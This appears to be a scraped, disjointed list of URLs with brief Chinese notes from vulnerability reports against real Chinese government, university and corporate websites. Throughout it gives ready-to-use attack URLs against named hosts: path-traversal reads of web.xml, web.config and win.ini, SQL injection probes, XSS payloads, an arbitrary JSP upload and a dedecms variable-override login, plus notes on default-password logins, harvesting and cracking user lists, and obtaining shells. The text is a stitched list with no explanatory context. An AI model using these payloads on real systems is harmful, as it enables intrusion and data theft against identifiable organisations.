http://yxzy.hrbmu.edu.cn:8080/cjxy/contentPage.php?news_id=243 http://asksheweb.hrbmu.edu.cn/article.php?id=1710 http://yxzy.hrbmu.edu.cn:8080/cjxy/admin/ http://www.37wan.net/content.php?id=63 http://ka.weibo.com/index.php/request/send/9392 http://www.leavesongs.com/other/weibo.html http://bsxt.gdbs.gov.cn/OuterNetWeb/appMain?service=work&func=applyAcceptEdit&controlSeq=数字 http://mall.juneyaoair.com/member/deltReceiver.jspx?id=11500 www.appstar.com.cn www.juneyaoair.com http://f.game.tom.com/admin.php http://f.game.tom.com//horind.php inurl:message.aspx?source,或inurl:contenttxt.*aspx http://www.yzsgjj.gov.cn/message.aspx?source= http://msi.shmtu.edu.cn/wp-login.php http://cie.shmtu.edu.cn/wp-login.php http://cyl.shmtu.edu.cn/wp-login.php http://58.40.126.130/ 9797168.com/admin存在后台管理登陆页面,开始尝试简单密码登陆,admin默认密码登陆成功,进入网站后台,可以配置本地网站。 http://122.144.129.126:8888/login http://xc.youja.cn:9025/uplus-cr-http/ id:22783试试 http://www.sanfu.com/?mod=ucp&do=orderlist&action=close&order_id=22783 http://www.qlcg.gov.cn/ http://www.qlcg.gov.cn/data/ inurl:ShowNews.php http://74.125.227.77/#newwindow=1&q=inurl:ShowNews.php http://www.6161.com.cn/shownews.php?id=1473 http://www.tpebus.com.tw/newsfile/shownews.php?newsno=476 http://www.cuiyueli.com/news/shownews.php?newsid=21 http://shanxi.gjsy.gov.cn/fwzn/201310/W020131230336029952189.doc http://bc.ifeng.com/c?db=ifeng&bid=16277,15962,3436&cid=2501,59,1&sid=33869&advid=349&camid=3546&show=ignore&url=http://www.18023.com http://cosmetics.ifeng.com/static/edit/ckfinder/ckfinder.html http://cosmetics.ifeng.com/datas/uploadimage/2014-06/21/files/2014_06_21_1403362625.jpg/1.php www.tax861.com.cn/articles/content.jsp?id=1203577855975 http://diantai.ifeng.com/webcall/pp.php?t=p&aid=104878&pf=public&s=renren https://www.google.ae/#q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:56628124+56626870 http://cwgk.ts.gov.cn/news.aspx?newsid=68807 http://xzfw.maoming.gov.cn/html/fwtd.html?cT=32 http://wsbs.maoming.gov.cn/portal/department/department!detail.action?hot=3&orgId=219016&tz=1 http://gcgk.maoming.gov.cn:8088/html/print?cT=tbl_cCT_XMBA&ID=43 http://www.hbsz.gov.cn/rfb/Content.aspx?newsid=11985 http://www.tljq.gov.cn/newslist.aspx?cateid=2e40f9ae-b2b9-4001-857f-40b7e26c9fa0 http://r.cnc.qzone.qq.com/cgi-bin/user/cgi_tmp_talk?qzone_uin=20737302&to_uin=569550119&g_tk=1593160781 http://www.phpcms.cn/ http://www.hbwsjs.gov.cn/adglif/css.jsp bdfc:d6c3:6926:8de7%13]:80 e92e:254c:46d3:e439%11]:80 http://www.kxmail.net/Customer/index.html http://mail.pushmold.com为例,在找回密码处, http://mail.pushmold.com/prog/get_passwd.php http://mail.pushmold.com/prog/get_passwd.server.php http://110.76.39.112:8080/szairmiddle/notification.do http://223.100.156.147/ http://www.win2.cn/Question.aspx?name=33 http://www.hipuro.com/products/index.aspx?mid=193(这里是mid参数木有过滤) www.hipuro.com http://www.hipuro.com/webmanage/Login.aspx http://web.toutiao.com/user/3344263360/ http://mp.toutiao.com/ http://oa.kjkd.com/使用万能密码可直接登录,登录后发现资源下载页面下载链接没有验证,下载到的web.config发现oracle账号,可以登录。 http://www.jhfgj.gov.cn/js/ http://www.lzrc.gov.cn/ http://www.jsychb.gov.cn/Article/js/4271/index.html http://zb.upc.edu.cn/lc/book/img/5446/index.html http://jwc.sqnc.edu.cn/UploadFile/2426/index.html http://jwc.gzhu.edu.cn/Editor/Edit/face/1133/index.html http://gh.wzu.edu.cn/en/images/9585/index.html http://zsxx.hntbc.edu.cn/Flash/Page/8498/index.html http://dag.cust.edu.cn/upload/GALLERY/7621/index.html http://lib.wtu.edu.cn/html/special/2006/5328/index.html http://zjswater.gov.cn/ContentDetail.aspx?typeid=9&sid=37 http://fxkh.pearlwater.gov.cn/ContentSubList.aspx?typeid=1&sortid=15 http://www.gdxjwater.cn/SurveyResult.aspx?id=1 inurl:frim/index1.htm inurl:frim/index2.htm inurl:frim/index3.htm inurl:frim/index4.htm inurl:frim/index5.htm inurl:frim/index6.htm http://www.neihanshequ.com/joke/new/ http://bbs.qibosoft.com/down2.php?v=hy1.0#down http://bbs.qibosoft.com/down2.php?v=photo1.0#down http://douco.com/ http://demo.douco.com/ http://bbs.qibosoft.com/down2.php?v=news1.0#down http://xxcx.jnu.edu.cn/ http://xxcx.jnu.edu.cn/wp-login.php http://demo.cuumall.com/ http://demo.cuumall.com/index.php/home/userinfo/chgrejpro/id/197 http://demo.cuumall.com/index.php/home/userinfo/chgrejpro/id/196 http://demo.cuumall.com/ ps:545就是我第二号的UID。 http://81.chinacourt.org/public/detail.php?id=203 http://222.66.142.20/ehr/ http://210.41.192.73:8081/ncre/Login!input.action http://210.41.192.73:8081/Silic.jsp http://www.nipic.com/show/10458044.html http://down.nipic.com/ajax/download_go http://www.4008107107.com/ http://analysis.tuniu.com/ta_cookie_script.php?visit_url=http%3a%2f%2fwww.tuniu.com%2fu%2forderdetail%2f3478187%23tourist_info http://www.huazhu.com/forum/topic-1876669 http://bmall.163.com/script/buyer/product_list/list_type___2/?product_keywords=%22%3E%3Cscript%3Ealert%28/wooyun/%29%3C/script%3E http://oa.china-sss.com/defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml http://oa.china-sss.com/defaultroot/netdisk/download_netdisk.jsp?path=1&fileName=../../WEB-INF/web&fileExtName=xml&fileSaveName=x http://oa.china-sss.com/defaultroot/information_manager/informationmanager_download.jsp?path=..&FileName=WEB-INF/web.xml&name=x http://oa.china-sss.com/defaultroot/download_netdisk.jsp?path=1&fileName=../../WEB-INF/web&fileExtName=xml&fileSaveName=x http://oa.china-sss.com/defaultroot/wage_manager/download_wage_excelMode.jsp?fileRealName=x&fileSaveName=../../WEB-INF/web.xml http://oa.china-sss.com/defaultroot/dossier/dossier_import.jsp http://oa.china-sss.com/defaultroot/govezoffice/custom_documentmanager/smartUpload.jsp?path=..&mode=add&fileName=hello.jsp&saveName=hello.jsp&tableName=hello.jsp&fileMaxSize=0&fileMaxNum=null&fileType=jsp&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 http://oa.china-sss.com/defaultroot/public/edit/admin/login.jsp http://oa.china-sss.com/defaultroot/public/edit2/admin/login.jsp http://oa.china-sss.com/defaultroot/outMailLoginCheck.jsp?userAccount=&outMailRandom= http://zsjy.hebtu.edu.cn/zhaosheng/dk2014/ http://zsjy.hebtu.edu.cn/zhaosheng/dk2014/test.asp http://127.0.0.1/cookie.asp?fuck=1 http://riyongp.3g518.com/enterprise.asp?regid=191903 http://www.hkl.com.cn/problem.asp?regid=185573 http://hb.189.cn/login/ http://tools.52pk.com:8088/CF30/CF_Order.aspx?TypeId=4【注入点】 http://tools.52pk.com:8088/CF30/CF_Order.aspx?TypeId=2 http://tools.52pk.com:8088/Manager/Update/ToolWeb_Update_Mes.aspx?ToolId=1 http://tools.52pk.com:8088/Manager/Update/Update_iFrame.aspx?ToolId=1 http://plus.aili.com/product.php?keyword=&nums=10'&channel=pro_shehua&jsonpcallback=jsonp1403449954995 http://mail.autohome.com.cn/, cn:67996056by http://safe.corpautohome.com/FindPwd.aspx,然后谷歌搜索顶级域名corpautohome.com,发现VPN平台https://ssl.vpn.corpautohome.com。 http://10.168.0.140/ https://10.168.0.82:8080/test/x.jsp http://edp.rbs.org.cn/news_show.php?id=303 http://u.ttpod.com/phone.do?method=downByModel&platformId=201012301134067952&phoneName=Nexus%20One&ch=hotPhone http://v1.ard.update.itlily.com:80/phone.do?method=downByPlatform&platformId=201012301134845294&ch=welcome https://www.ruby-lang.org/en/news/2013/11/22/heap-overflow-in-floating-point-parsing-cve-2013-4164/ http://www.rapid7.com/db/modules/auxiliary/dos/http/rails_json_float_dos http://119.90.40.135/console/manage/index.aspx?pagesize=10&pagenum=20 https://code.csdn.net/snippets/398903 http://www3.sdufe.edu.cn/ppMyAdmin/ http://passport.csdn.net/ajax/accounthandler.ashx?t=log&u=testuser&p=testpasswd&remember=0&callback=csdn.login_back&r=1403065352217 http://ct.ctrip.com/crptravel/index.aspx http://125.39.222.84/ http://125.39.222.180/ http://125.39.222.170/ https://yp.bianfeng.com/dashboard/h/login.html http://58.48.109.80:8012/selDept.php http://58.48.109.80:8012/userlist.php,导致几千用户名泄露,然后通过http://58.48.109.80:8012/check.php进行破解,破解出太多用户密码了,内部大量信息泄露,就不详述了。 http://manage.ncjy.net/cms/web/downloadFiles.jsp?file=C:\WINDOWS\system32\cmd.exe http://manage.ncjy.net/cms/web/downloadFiles.jsp?file=C:\Program http://www.cufe.edu.cn/cms/web/downloadFiles.jsp?file=/home/cms61/tomcat6.0.33/webapps/publish/gfjjyglyjy/docs/2011-10/20111028132433306450.pdf http://www.cufe.edu.cn/cms/web/downloadFiles.jsp?file=/home/cms61/tomcat6.0.33/webapps/cms/web/downloadFiles.jsp www.hztele.com.cn/manage/login.jsp www.hztele.com.cn/bbs ip:6868/login ip:28017 http://3g.ganji.com/ http://tuanwei.xjtu.edu.cn/index.php/Zixun/contentshow/id/2206.html http://sef.xjtu.edu.cn/news_content.asp?id=2074 http://zupei.xjtu.edu.cn/admin/Login.asp http://zupei.xjtu.edu.cn/admin/admin.asp http://www.jhwczj.gov.cn/newsinfo.jsp?id=1081 www.jhwczj.gov.cn http://www.nanhai.gov.cn/cms/jsp/shequ/show_info.jsp?sid=01011 http://www.nanhai.gov.cn/cms/jsp/shequ/show_info.jsp?sid=01011 http://www.cdedu.gov.cn/participation/SecretaryHall.aspx?id=22 http://t.hexun.com/p2/grouphomesearch.html?firstLetter=Y www.sxazj.gov.cn/download.jsp?path=../WEB-INF/web.xml www.nqs.gov.cn/cms/web/download.jsp?FileUrl=web/download.jsp http://www.heyuan.gov.cn/do_download.jsp?path=/do_download.jsp rd.heyuan.gov.cn/do_download.jsp?path=/do_download.jsp http://www.lntour.gov.cn/load.jsp?path=../WEB-INF&file=web.xml http://www.zscj.gov.cn/DownFile/OpenFile.aspx?XFileName=../web.config&FileName=web.config www.zsoaf.gov.cn/DownFile/OpenFile.aspx?XFileName=../web.config&FileName=web.config http://bbs.nbdl.gov.cn/down.aspx?path=web.config&fname=web http://www.hfaic.gov.cn/gongshang/DownFile?path=C:/windows/win.ini&showname=win www.tclm.gov.cn:8080/downLoadFile?filePath=WEB-INF/web.xml http://www.ngtc.gov.cn/ngtc/showimage?filePath=WEB-INF/&fileName=web.xml&fileSort=-1111 http://www.hebgwyj.gov.cn/cyportal1.3/downloadtag.jsp?fileName=web.xml&filePath=../WEB-INF/web.xml http://www.wztax.gov.cn/system/FunPages/DownloadFile.jsp?filePath=./WEB-INF&name=web.xml http://xzsp.hcq.gov.cn:94/servlet/download?filepath=/WEB-INF/web.xml&filename=web.xml http://www.xczwzx.gov.cn/FileDownload?filepath=C:windows\win.ini&dispname=win.ini www.yk365.gov.cn/servlet/FileDownload?filepath=C:windows/win.ini www.tongcheng.gov.cn/servlet/FileDownload?filepath=C:windows/win.ini www.56hlj.com/news/downLoad.jsp?filePath=WEB-INF/web.xml http://pc.sach.gov.cn/news/downLoad.jsp?filePath=WEB-INF/web.xml http://www.kuaipan.cn/ http://www.kuaipan.cn/account_login.htm http://202.106.152.13/FCKeditor/editor/filemanager/connectors/uploadtest.html http://www.huazhu.com/PointGift/ShoppingCar.aspx http://api.busdh.com/market-api/appgame/global?f=f384&v=v6.5.0.2013123016 http://api.busdh.com/market-api/appgame/global?f=f384&v=v6.5.0.2013123016 inurl:online-service!findByAppItemId.action?id= http://long.zhuoyou.com/bbs/data/attachment/forum/201406/23/235748ehbchgldh26d6vli.png/.php http://zjdt.lyghrss.gov.cn:7001/lygzjdt/pages/列目录 http://zjdt.lyghrss.gov.cn:7001/lygzjdt/此处查询到后台管理地址 http://zjdt.lyghrss.gov.cn:7001/lygzjdt/pages/login/adminlogin.html http://zjdt.lyghrss.gov.cn:7001/lygzjdt/pages/lygzj/admin/adminLogin.action http://news.buaa.edu.cn/dispnews.php?type=1&nid=113844&s_table=news_txt http://59.42.176.156:8012/selDept.php,广州市国迈科技有限公司的腾讯通客户端部署平台,因腾讯通的安全隐患,http://59.42.176.156:8012/userlist.php,导致用户名泄露,通过http://59.42.176.156:8012/check.php进行破解,可破解出部分用户密码,然后通过腾讯通客户端就可以登录了,这样可能会造成内部信息泄露,就不详述了。 http://124.232.135.83/10000/login.jsp http://123.157.209.83:8080/ZhongCaiPRM/login.action http://grid.cma.gov.cn http://grid.cma.gov.cn/cmag/trac/newticket?reporter=anonymous&summary=AssertionError%3A+Session+ID+not+set&description=%3D%3D%3D%3D+How+to+Reproduce+%3D%3D%3D%3D%0D%0A%0D%0AWhile+doing+a+POST+operation+on+%60%2Fprefs%2Fadvanced%60%2C+Trac+issued+an+internal+error.%0D%0A%0D%0A%27%27%28please+provide+additional+details+here%29%27%27%0D%0A%0D%0ARequest+parameters%3A%0D%0A{{{%0D%0A{%27__FORM_TOKEN%27%3A+u%27519a024571067c73f538aa5f%27%2C%0D%0A+%27action%27%3A+u%27save%27%2C%0D%0A+%27loadsid%27%3A+u%27%27%2C%0D%0A+%27newsid%27%3A+u%27fbcdb1e8daf790312eaf0c26%27%2C%0D%0A+%27panel_id%27%3A+u%27advanced%27%2C%0D%0A+%27restore%27%3A+u%27\u8f7d\u5165%27}%0D%0A}}}%0D%0A%0D%0AUser+agent%3A+%60Mozilla%2F5.0+%28Windows+NT+6.1%3B+rv%3A30.0%29+Gecko%2F20100101+Firefox%2F30.0%60%0D%0A%0D%0A%3D%3D%3D%3D+System+Information+%3D%3D%3D%3D%0D%0A%E7%B3%BB%E7%BB%9F%E4%BF%A1%E6%81%AF%E4%B8%8D%E5%8F%AF%E7%94%A8%0D%0A%0D%0A%3D%3D%3D%3D+Enabled+Plugins+%3D%3D%3D%3D%0D%0A%E6%8F%92%E4%BB%B6%E4%BF%A1%E6%81%AF%E4%B8%8D%E5%8F%AF%E7%94%A8%0D%0A%0D%0A%3D%3D%3D%3D+Python+Traceback+%3D%3D%3D%3D%0D%0A{{{%0D%0ATraceback+%28most+recent+call+last%29%3A%0D%0A++File+%22%2Fusr%2Flib%2Fpython2.6%2Fsite-packages%2FTrac-0.12.1-py2.6.egg%2Ftrac%2Fweb%2Fmain.py%22%2C+line+511%2C+in+_dispatch_request%0D%0A++++dispatcher.dispatch%28req%29%0D%0A++File+%22%2Fusr%2Flib%2Fpython2.6%2Fsite-packages%2FTrac-0.12.1-py2.6.egg%2Ftrac%2Fweb%2Fmain.py%22%2C+line+237%2C+in+dispatch%0D%0A++++resp+%3D+chosen_handler.process_request%28req%29%0D%0A++File+%22%2Fusr%2Flib%2Fpython2.6%2Fsite-packages%2FTrac-0.12.1-py2.6.egg%2Ftrac%2Fprefs%2Fweb_ui.py%22%2C+line+77%2C+in+process_request%0D%0A++++template%2C+data+%3D+chosen_provider.render_preference_panel%28req%2C+panel_id%29%0D%0A++File+%22%2Fusr%2Flib%2Fpython2.6%2Fsite-packages%2FTrac-0.12.1-py2.6.egg%2Ftrac%2Fprefs%2Fweb_ui.py%22%2C+line+97%2C+in+render_preference_panel%0D%0A++++self._do_load%28req%29%0D%0A++File+%22%2Fusr%2Flib%2Fpython2.6%2Fsite-packages%2FTrac-0.12.1-py2.6.egg%2Ftrac%2Fprefs%2Fweb_ui.py%22%2C+line+148%2C+in+_do_load%0D%0A++++req.session.get_session%28oldsid%29%0D%0A++File+%22%2Fusr%2Flib%2Fpython2.6%2Fsite-packages%2FTrac-0.12.1-py2.6.egg%2Ftrac%2Fweb%2Fsession.py%22%2C+line+189%2C+in+get_session%0D%0A++++self.bake_cookie%28%29%0D%0A++File+%22%2Fusr%2Flib%2Fpython2.6%2Fsite-packages%2FTrac-0.12.1-py2.6.egg%2Ftrac%2Fweb%2Fsession.py%22%2C+line+170%2C+in+bake_cookie%0D%0A++++assert+self.sid%2C+%27Session+ID+not+set%27%0D%0AAssertionError%3A+Session+ID+not+set%0D%0A}}}&create=%E5%88%9B%E5%BB%BA# http://grid.cma.gov.cn/cmag/portal/guest/52/r/ http://grid.cma.gov.cn/cmag/portal/guest/home/r/ http://202.103.124.52/ http://www.cqlpa.com/cyysquery.jsp http://gdb.17173.com/browser.jsp http://gdb.17173.com/browser.jsp?sort=1&file=%2Fhome%2Fhttpd%2Fhtml%2Fgamedb.17173.com%2FWEB-INF%2Fweb.xml http://gdb.17173.com/browser.jsp?sort=1&file=%2Fhome%2Fhttpd%2Fhtml%2Fgamedb.17173.com%2FWEB-INF%2Fstruts-config.xml http://gdb.17173.com/browser.jsp?sort=1&dir=%2Fhome%2Fhttpd%2Fhtml http://gdb.17173.com/browser.jsp?sort=1&file=%2Fhome%2Fbackup%2Fresin.conf http://gdb.17173.com/browser.jsp?sort=1&dir=%2F http://u.uzai.com/manage/order_details/F8C8B3C90B0B0EA5 http://demo.oa8000.com为例。 http://demo.oa8000.com http://demo.oa8000.com/OAapp/jsp/download.jsp?filename=boot.ini&filePath=C%3A%2Fboot.ini&noDecode=1 http://demo.oa8000.com/OAapp/jsp/downloadClient.jsp?filename=boot.ini&filePath=C%3A%2Fboot.ini&noDecode=1 http://forum.dis9.club/logging.php?action=logout&formhash=b1abb3e2&referer=%27-alert%28document.domain%29-%27 http://download.haowan123.com http://download.haowan123.com/?game=6&os=2%20and%201=1 http://download.haowan123.com/?game=6&os=2%20and%201=2 http://www.nysey.com//nytwohospital/hospitalzhuanke/zkjiaoyudisplay.jsp?id=115 http://58.32.236.197:8000/ https://pt.hnu.edu.cn/zfca/login)的密码找回功能: http://webmail.hnu.edu.cn/)收到新密码: http://jky.wxcd.net.cn:8008/license!getExpireDateOfDays.action http://ltx.ncu.edu.cn/ http://ltx.ncu.edu.cn/wp-login.php http://58.56.17.165:8012/selDept.php http://58.56.17.165:8012/userlist.php,导致大量用户名泄露,然后通过http://58.56.17.165:8012/check.php进行破解,可破解出不少密码,然后通过腾讯通客户端就可以登录了,这样可能会造成内部信息泄露,就不详述了。 http://cs.henu.edu.cn/ http://cs.henu.edu.cn/index.php/cs_admin/index xtdoc.9you.com/wp-login.php http://www.ly.com/iflight/requireordernew.aspx?type=tuan http://job.henu.edu.cn/showNewsinfo.aspx?id=1903and1=1&CID=36 http://shop.wanmei.com/images/ http://www.wbo-hotel.com/company/newshow.asp?id=14 http://www.wbo-hotel.com/company https://passport.safedog.cn/chgEmailSubmit.html?userName=admin&oldEmail=aktest@163.com&email=aktest@163.com http://rsc.hbu.cn/ http://127.0.0.1 http://target/showContent.aspx?id=6 http://bcs.zsnet.com/是一个登陆界面。最简单的测试就是输入一些特殊字符,比如'。在密码用万能密码输入,出错如下图: http://demo.kesion.com/ pujun.li/xss.swf http://www.zzairport.com/images/ http://www.zzairport.com/backup/ http://www.china-pub.com/jiaocai/jc_university/jc_university.asp?bookid=14975 http://www.adultscriptpro.com/demo.html http://mitv.tcl.com/DRP http://bit.tcl.com/phpsso_server/2013.php http://59.38.32.31:8012/selDept.php,珠海北师大的腾讯通客户端部署平台,因腾讯通的安全隐患,http://59.38.32.31:8012/userlist.php,导致大量用户名泄露,然后通过http://59.38.32.31:8012/check.php进行破解,几千位用户,可破解出不少密码,然后通过腾讯通客户端就可以登录了,这样可能会造成内部信息泄露,就不详述了。 http://advisor.dell-brand.com/index.php?a=index&m=solution&id=45 http://cmis.bhfz.com/cmis40/ http://61.153.216.101/xiao-you/ http://61.153.216.101/xiao-you/dedecms/login.php?dopost=login&validate=dcug&userid=admin&pwd=admin&_POST[GLOBALS][cfg_dbhost]=255.255.255.255&_POST[GLOBALS][cfg_dbuser]=dbusername&_POST[GLOBALS][cfg_dbpwd]=dbpassword&_POST[GLOBALS][cfg_dbname]=dbname http://59.63.158.9:8012/selDept.php,某省委宣传部的腾讯通客户端部署平台,因腾讯通存在的安全隐患,http://59.63.158.9:8012/userlist.php,导致用户名泄露,通过http://59.63.158.9:8012/check.php进行破解,可破解出部分用户密码,然后通过腾讯通客户端就可以登录了,这样可能会造成内部信息泄露,就不详述了。发现问题后没有做进一步测试。 http://v57.demo.dedecms.com/plus/recommend.php?aid=1&action=sendmail&title=%3Ciframe%20src=//www.baidu.com%3E%3C/iframe%3E http://v57.demo.dedecms.com/plus/recommend.php?aid=1&action=sendmail&title=%3CSCRIPT%20SRC=//ha.ckers.org/xss.js%3E%3C/SCRIPT%3E http://xueke.hbu.cn/ http://xueke.hbu.cn/admin/ http://blog.guang.com/wp-login.php http://www.maccms.com/ http://www.zg10080.com/help.aspx http://www.zg10080.com/top.aspx http://www.zg10080.com/webbak.rar d.longtugame.com/daotadata/zrgl?id=3 http://traffic.okaybuy.com.cn/ip_dst.php?site=1%27 http://www.keyp2p.com/thread/14/2014/02/thread2491.html http://www.gxs58.com/thread/16/2014/06/thread4981.html http://221.192.237.91/zsnew/news.php?id=382 http://117.27.230.154/resin-admin/ http://117.27.230.155/resin-admin/ http://www.sxgjj.gov.cn/class.aspx?d=1 http://www.kalcaddle.com http://183.63.187.15/Admin/login.aspx http://www.xjnj.gov.cn/ http://www.xiac.com.cn/info.asp?&page=1&Keywords=&Sort=2 http://www.xiac.com.cn/index1.asp inurl:action http://220.180.184.66:1980/ahsffyww/Default3.action?xxzy.id=3293 http://fy.hnsfj.gov.cn/Login.action http://60.172.0.38:1980/ahsffyww/Default2.action?xxzyxxzy.currentpage=1&xxzyfl.id=7 http://220.180.199.178:1980/ahsffyww/Default3.action?xxzy.id=1254 http://220.178.252.61:1980/ahsffyww/Default3.action?xxzy.id=967 http://218.22.93.234:1980/ahsffyww/Default2.action?xxzyxxzy.currentpage=1&xxzyfl.id=3 http://60.173.113.172:1980/ahsffyww/Default2.action?xxzyxxzy.currentpage=1&xxzyfl.id=7 http://218.23.48.42:1980/ahsffyww/Default3.action?xxzy.id=1113 http://60.174.104.34:1980/ahsffyww/Default2.action?xxzyxxzy.currentpage=1&xxzyfl.id=5 http://61.191.213.82:1980/ahsffyww/Default3.action?xxzy.id=1652 http://60.173.184.226:1980/ahsffyww/Default3.action?xxzy.id=143 http://61.191.31.26:1980/ahsffyww/Default3.action?xxzy.id=67 http://sys.sdems.com/ a.asp/1.jpg形式可以拿网站shell http://www.xisu.edu.cn/news/display.php?table=pic_news&id=281 http://www.xisu.edu.cn/news/display.php?table=pic_news%20where%20id=281%20and%201=2%20union%20select%201,2,3,4,5,6--&id=281 http://glpt.gdjxjy.com.cn/login.jsp http://tzgl.ynjy.cn/AjaxGetWT.aspx?UserId=wooyun&a=0.1317291921004653 http://hainan.zbglxt.com/AjaxGetWT.aspx?UserId=wooyun&a=0.9363195481710136 http://jx.lianyisoft.com/AjaxGetWT.aspx?UserId=wooyun&a=0.8919568208511919 http://hunan.lianyisoft.com/AjaxGetWT.aspx?UserId=wooyun&a=0.9742523946333677 http://sx.lianyisoft.com/AjaxGetWT.aspx?UserId=wooyun&a=0.29541228362359107 http://zbtj.hyedu.net.cn/AjaxGetWT.aspx?UserId=wooyun&a=0.007287467364221811 http://218.76.27.45:8062/AjaxGetWT.aspx?UserId=wooyun&a=0.6161854930687696 http://sc.zbglxt.com/AjaxGetWT.aspx?UserId=wooyun&a=0.3183394852094352 http://henan.zbglxt.com/AjaxGetWT.aspx?UserId=wooyun&a=0.29813497606664896 http://hb.zbglxt.com/AjaxGetWT.aspx?UserId=wooyun&a=0.63099249987863 http://qh.zbglxt.com/AjaxGetWT.aspx?UserId=wooyun&a=0.47284267260693014 http://ah.zbglxt.com/AjaxGetWT.aspx?UserId=wooyun&a=0.038404270773753524 http://yd.sozhen.com/User/InnOL_Login.aspx http://x55.me/openin.firefox http://hb.189.cn/pages/login/adsllogin/adsllogin.jsp http://filedownload.ktvme.com:8086/ http://filedownload.ktvme.com:9500/test.php http://filedownload.ktvme.com:9500/ http://eip.centerm.com/ http://xaszjd.com/ http://xaszjd.com/news.asp?classid=9 http://127.0.0.1/user.php?act=order_detail&order_id=68 http://127.0.0.1/admin/order.php?act=info&order_id=68&print=1 http://pay.553.com/ http://cws.bnu.edu.cn/show.jsp?id=830 http://help.tipask.com/q-19646.html http://help.tipask.com/answer/append/19646/3962.html http://help.tipask.com/question/adopt/?qid=19646&aid=3962 http://58.246.121.44:8080/basepro/login.jsp http://61.233.65.9 http://61.233.102.202 http://61.233.65.9/login_check.php http://61.233.65.9/inc/downfile.php?id_ls=64 http://dorm.pku.edu.cn/news/news.asp?bh=3534 http://do http://www.yilibabyclub.com/admin/login.aspx http://m.tujia.com/nosearch/***?***=216400 http://labs.chinamobile.com/my/ajax_my_ims_init.php?action=record&ft=cloud&channel_id=4296490197 http://labs.chinamobile.com/yueke/show/?url=javascript%3Aprompt%281%29%2F%2F http://www.cm-analysis.com/recom/sugg.php?idealid=blog_ad2&uid=&_st=1403336487090&_tt=%E8%BD%BB%E5%8D%9A%E5%AE%A2_%E7%A7%BB%E5%8A%A8Labs&_ca_tk=o9rbozv8509tmoay85kslb3wcvrmlc7p&tm=1403336975121&placehold=div_for_ad04%27%3E%22%3E%3C%2Ftitle%3E%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cimg+src%3Da+onerror%3Dprompt%281%29%3E http://labs.chinamobile.com/api/upload.php http://labs.chinamobile.com:80/upload.php http://221.182.247.19:1005/pecardweb/ www.111g.com www.111g.com http://www.jiuaidai.com/data/dbbackup/dw_user_0.sql http://www.jiuaidai.com/data/dbbackup/dw_userinfo_0.sql http://www.szrtc.cn/Home/Register http://mp3master.baidu.com/ http://sd.189.cn/selfservice/pay/getOweCharge http://sd.189.cn/selfservice/promotion/campus http://www.fdc.zju.edu.cn/house/Login.aspx http://www.fdc.zju.edu.cn/house/RoomUseCheckList.aspx"中的"根据房间地址查询"存在sql注入 www.fdc.zju.edu.cn http://www.fdc.zju.edu.cn http://scass.hangankeji.com/pcToHome.action,测试了下,存在不少漏洞 http://scass.hangankeji.com/pcToNormalReport.action http://scass.hangankeji.com/pcToReportQuery.action这个点,简单手工了测试了一下,本站已shell了,这个点就不深入了,主要是现在凌晨2点了,困死了~~ http://kyxt.u0759.com/web/portal/home.action http://www.ynsncny.com/login/Jeecms.do http://www.gykj.gov.cn/login/Jeecms.do http://www.hhyq.gov.cn/hhyq/login/Jeecms.do http://61.133.220.38:8012/selDept.php,宁夏回族自治区某政府部门的腾讯通客户端部署平台,因腾讯通存在的安全隐患,http://61.133.220.38:8012/userlist.php,导致用户名泄露,通过http://61.133.220.38:8012/check.php进行破解,可破解出部分用户密码,然后通过腾讯通客户端就可以登录了,这样可能会造成内部信息泄露,就不详述了。发现问题后没有做进一步测试。 http://61.138.234.18:8012/selDept.php,新疆某政府部门的腾讯通客户端部署平台,因腾讯通存在的安全隐患,http://61.138.234.18:8012/userlist.php,导致用户名泄露,通过http://61.138.234.18:8012/check.php进行破解,可破解出部分用户密码,然后通过腾讯通客户端就可以登录了,这样可能会造成内部信息泄露,就不详述了。该问题是腾讯通自身的问题,与实施方无关,另外发现问题后没有做进一步测试。 http://112.64.**.**:8080/houtai/login.php http://112.64.**.**:8081/houtai/login.php http://112.64.**.**:8080/ajaxdb/getCdrByStarttime.php http://112.64.**.***:8080/ajaxdb/getCdrByStarttime.php?usr=a http://www.icoremail.gd.cn/ http://blog.sohu.com/home/setting/info.htm http://mo.gw.com.cn/ http://mo.gw.com.cn/type.php?typeid=100 http://train.gw.com.cn/ http://www.sztaiji.com/) inurl:indexAction.action inurl:zxjbAction_showInfo.action?wid= http://zwzx.anshun.gov.cn/bgxz/bgxzAction_executeBack.action http://zwzx.gzxy.gov.cn/bgxz/bgxzAction_executeBack.action http://nyzw.gov.cn/bgxz/bgxzAction_executeBack.action http://www.qzasc.cn/bgxz/bgxzAction_executeBack.action http://zwzx.xifeng.gov.cn/bgxz/bgxzAction_executeBack.action http://61.159.149.200/bgxz/bgxzAction_executeBack.action http://fuwu.donggang.gov.cn/bgxz/bgxzAction_executeBack.action http://211.140.246.58:8080/bgxz/bgxzAction_executeBack.action http://mdjsp.gov.cn/bgxz/bgxzAction_executeBack.action http://blog.sohu.com/home/setting/info.htm http://xb.henu.edu.cn/index.php/admin_control/login http://fxy.henu.edu.cn/index.php/login/index http://211.138.41.19/web/userconfig/login_prelogin.action http://117.79.92.214/ http://117.79.92.213/login.jsp http://jf.hnticai.com/luck/init/init.action http://jf.hnticai.com/Silic.jsp http://ccclub.cmbchina.com/cash/CashInvImgInfo.aspx?fileID=99901406252300000815 http://ccclub.cmbchina.com/cash/CashInvImgInfo.aspx?fileID=99901406252300000814 http://ccclub.cmbchina.com/cash/CashInvImgInfo.aspx?fileID=99901406252300000813 http://ccclub.cmbchina.com/cash/CashInvImgInfo.aspx?fileID=99901406252300000812 http://ccclub.cmbchina.com/cash/CashInvImgInfo.aspx?fileID=99901406252300000811 www.chinacreator.com inurl:comm_front inurl:comm_front/email inurl:login.jsp http://www.hngzw.gov.cn/login.jsp http://www.czsx.gov.cn/login.jsp http://www.zixing.gov.cn/login.jsp http://www.czbeihu.gov.cn/login.jsp http://www.hn408.org/login.jsp http://yuanjiang.gov.cn/login.jsp http://www.hn12333.com:81/ http://www.rc.gov.cn/login.jsp http://www.cetz.gov.cn/login.jsp http://www.hnbzdj.com/login.jsp http://www.hnrst.gov.cn/login.jsp http://www.lwx.gov.cn:88/login.jsp http://www.bhqrd.gov.cn/login.jsp http://www.hnrm.gov.cn/login.jsp http://www.hngy.gov.cn/login.jsp http://www.hunangtzy.com/login.jsp http://www.hnipo.gov.cn/login.jsp 